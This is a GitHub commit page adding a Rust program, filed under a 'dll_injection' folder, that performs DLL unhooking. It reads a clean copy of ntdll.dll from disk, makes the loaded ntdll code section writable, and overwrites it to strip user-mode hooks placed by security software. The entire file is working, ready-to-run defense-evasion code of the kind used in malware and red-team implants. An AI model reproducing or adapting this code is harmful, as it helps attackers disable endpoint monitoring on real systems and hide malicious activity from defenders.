Skip to content
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.

Commit 222eedf

Browse files
committedMar 8, 2025
DLL Unhooking
1 parent 21a3e2c commit 222eedf

File tree

1 file changed

+103
-0
lines changed

1 file changed

+103
-0
lines changed
 

‎dll_injection/dll_unhooking.rs

Lines changed: 103 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,103 @@
1+
/*
2+
DLL Unhooking
3+
Thanks to RedTeamNotes:
4+
Resource Used From [https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++]
5+
Author: @5mukx
6+
*/
7+
8+
9+
use std::ffi::CString;
10+
use std::ptr::{self, null_mut};
11+
12+
use winapi::shared::minwindef::HMODULE;
13+
use winapi::um::fileapi::{CreateFileA, OPEN_EXISTING};
14+
use winapi::um::handleapi::CloseHandle;
15+
use winapi::um::libloaderapi::GetModuleHandleA;
16+
use winapi::um::memoryapi::{MapViewOfFile, VirtualProtect, FILE_MAP_READ};
17+
use winapi::um::psapi::GetModuleInformation;
18+
use winapi::um::winbase::CreateFileMappingA;
19+
use winapi::um::winnt::{GENERIC_READ, IMAGE_DOS_HEADER, IMAGE_NT_HEADERS64, IMAGE_SECTION_HEADER, PAGE_EXECUTE_READWRITE, PAGE_READONLY, SEC_IMAGE};
20+
use winapi::um::{processthreadsapi::GetCurrentProcess, psapi::MODULEINFO};
21+
use winapi::ctypes::c_void;
22+
23+
fn main(){
24+
unsafe{
25+
let process: *mut c_void = GetCurrentProcess();
26+
let mut mi: MODULEINFO = std::mem::zeroed();
27+
let ntdll_cstr = CString::new("ntdll.dll").unwrap();
28+
let ntdll_module: HMODULE = GetModuleHandleA(ntdll_cstr.as_ptr());
29+
30+
GetModuleInformation(
31+
process,
32+
ntdll_module,
33+
&mut mi,
34+
std::mem::size_of::<MODULEINFO>() as u32,
35+
);
36+
37+
let ntdll_base = mi.lpBaseOfDll;
38+
let ntdll_file = CreateFileA(
39+
ntdll_cstr.as_ptr(),
40+
GENERIC_READ,
41+
0,
42+
null_mut(),
43+
OPEN_EXISTING,
44+
0,
45+
null_mut(),
46+
);
47+
48+
let ntdll_mapping = CreateFileMappingA(
49+
ntdll_file,
50+
null_mut(),
51+
PAGE_READONLY | SEC_IMAGE,
52+
0,
53+
0,
54+
ptr::null(),
55+
);
56+
57+
let ntdll_mapping_address = MapViewOfFile(
58+
ntdll_mapping,
59+
FILE_MAP_READ,
60+
0,
61+
0,
62+
0
63+
);
64+
65+
let hook_dos_header = ntdll_base as *const IMAGE_DOS_HEADER;
66+
let hook_nt_header = (ntdll_base as usize + (*hook_dos_header).e_lfanew as usize) as *const IMAGE_NT_HEADERS64;
67+
68+
for i in 0..(*hook_nt_header).FileHeader.NumberOfSections{
69+
let hook_sec_header = (hook_nt_header as usize + 0xF8 + (i as usize * 0x28)) as *const IMAGE_SECTION_HEADER;
70+
71+
if (*hook_sec_header).Name.starts_with(b".text\0") {
72+
let mut old_protect = 0u32;
73+
let section_base = (ntdll_base as usize + (*hook_sec_header).VirtualAddress as usize) as *mut u8;
74+
let section_size = *(*hook_sec_header).Misc.VirtualSize() as usize;
75+
76+
VirtualProtect(
77+
section_base as *mut _,
78+
section_size,
79+
PAGE_EXECUTE_READWRITE,
80+
&mut old_protect,
81+
);
82+
83+
std::ptr::copy_nonoverlapping(
84+
(ntdll_mapping_address as usize + (*hook_sec_header).VirtualAddress as usize) as *const u8, // Source Address
85+
section_base, // Destination Address
86+
section_size, // Size
87+
);
88+
89+
VirtualProtect(
90+
section_base as *mut _,
91+
section_size,
92+
old_protect,
93+
&mut old_protect,
94+
);
95+
}
96+
}
97+
CloseHandle(process);
98+
CloseHandle(ntdll_file);
99+
CloseHandle(ntdll_mapping);
100+
CloseHandle(ntdll_module as *mut c_void);
101+
}
102+
}
103+

0 commit comments

Comments
 (0)
Please sign in to comment.